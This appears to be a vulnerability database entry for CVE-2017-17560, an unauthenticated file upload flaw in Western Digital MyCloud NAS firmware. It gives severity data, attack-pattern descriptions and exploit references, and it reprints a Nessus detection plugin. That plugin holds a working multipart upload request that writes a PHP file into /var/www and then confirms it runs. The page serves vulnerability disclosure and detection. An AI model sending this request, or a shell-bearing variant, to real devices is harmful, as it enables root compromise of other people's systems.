Vulnerabilities > CVE-2017-17560 - Improper Authentication vulnerability in Westerndigital MY Cloud Pr4100 Firmware 2.30.172

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
westerndigital
CWE-287
critical
nessus
exploit available
metasploit

Summary

An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

Vulnerable Configurations

Part Description Count
OS
Westerndigital
1
Hardware
Westerndigital
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Authentication Abuse
    An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Utilizing REST's Trust in the System Resource to Register Man in the Middle
    This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to place man in the middle once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.
  • Man in the Middle Attack
    This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components.

D2sec

nameWestern Digital My Cloud File Upload
urlhttp://www.d2sec.com/exploits/western_digital_my_cloud_file_upload.html

Exploit-Db

descriptionWestern Digital MyCloud - 'multi_uploadify' File Upload (Metasploit). CVE-2017-17560. Remote exploit for PHP platform. Tags: Metasploit Framework (MSF)
fileexploits/php/remote/43356.rb
idEDB-ID:43356
last seen2017-12-18
modified2017-12-18
platformphp
port
published2017-12-18
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/43356/
titleWestern Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)
typeremote

Metasploit

descriptionThis module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
idMSF:EXPLOIT/LINUX/HTTP/WD_MYCLOUD_MULTIUPLOAD_UPLOAD
last seen2020-06-12
modified2017-12-14
published2017-11-28
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb
titleWestern Digital MyCloud multi_uploadify File Upload Vulnerability

Nessus

NASL familyCGI abuses
NASL idWD_MYCLOUD_MULTIUPLOAD.NASL
descriptionThe remote WD MyCloud device is affected by a file upload vulnerability that allows a remote attacker to upload and execute files.
last seen2020-06-01
modified2020-06-02
plugin id105732
published2018-01-10
reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/105732
titleWestern Digital MyCloud Unauthenticated File Upload
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(105732);
  script_version("1.5");
  script_cvs_date("Date: 2019/11/08");

  script_cve_id("CVE-2017-17560");

  script_name(english:"Western Digital MyCloud Unauthenticated File Upload");
  script_summary(english:"Uploads a file to the MyCloud device");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is affected by a file upload vulnerability");
  script_set_attribute(attribute:"description", value:
"The remote WD MyCloud device is affected by a file upload vulnerability
that allows a remote attacker to upload and execute files.");
  # http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d671658a");
  script_set_attribute(attribute:"see_also", value:"https://www.exploitee.rs/index.php/Western_Digital_MyCloud");
  script_set_attribute(attribute:"solution", value:
"Western Digital reported that they fixed this vulnerability in firmware
version 2.30.174. However, Tenable has confirmed that 2.30.174 does not
contain a fix.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Western Digital My Cloud File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Western Digital MyCloud multi_uploadify File Upload Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/11/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/10");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wd_mycloud_detect.nbin");
  script_require_keys("installed_sw/WD MyCloud");
  script_require_ports("Services/www", 80, 443, 8081);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

appname = "WD MyCloud";
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:80, embedded:TRUE);
install = get_single_install(app_name:appname, port:port);

# generate the payload
name = SCRIPT_NAME - ".nasl" + "_" + unixtime();
upload = '--------------------------275ea22986aa6a17\r\n' +
         'Content-Disposition: form-data; name="Filedata[]"; filename="' + name + '.php"\r\n' +
         'Content-Type: application/octet-stream\r\n\r\n' +
         '<?php print("Hello from Nessus!"); ?>\r\n' +
         '--------------------------275ea22986aa6a17--\r\n';

# send the exploit
res = http_send_recv3(
  method:'POST',
  item:'/web/jquery/uploader/multi_uploadify.php?folder=/var/www/',
  port:port,
  content_type:'multipart/form-data; boundary=------------------------275ea22986aa6a17',
  data:upload,
  exit_on_fail:TRUE);

if (empty_or_null(res) || "302" >!< res[0])
{
  audit(AUDIT_DEVICE_NOT_VULN, "The " + install["model"]);
}

# get the page we created
res = http_send_recv3(method:'GET', item:'/' + name + '.php', port:port);
if (empty_or_null(res) || "200" >!< res[0] || "Hello from Nessus!" >!< res[2])
{
  audit(AUDIT_DEVICE_NOT_VULN, "The " + install["model"]);
}

file_location = build_url(qs:'/' + name + '.php', port:port);
report = 'Nessus created a new page at:\n\n' + file_location + '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/145447/wd_mycloud_multiupload_upload.rb.txt
idPACKETSTORM:145447
last seen2017-12-15
published2017-12-15
reporterZenofex
sourcehttps://packetstormsecurity.com/files/145447/Western-Digital-MyCloud-multi_uploadify-File-Upload.html
titleWestern Digital MyCloud multi_uploadify File Upload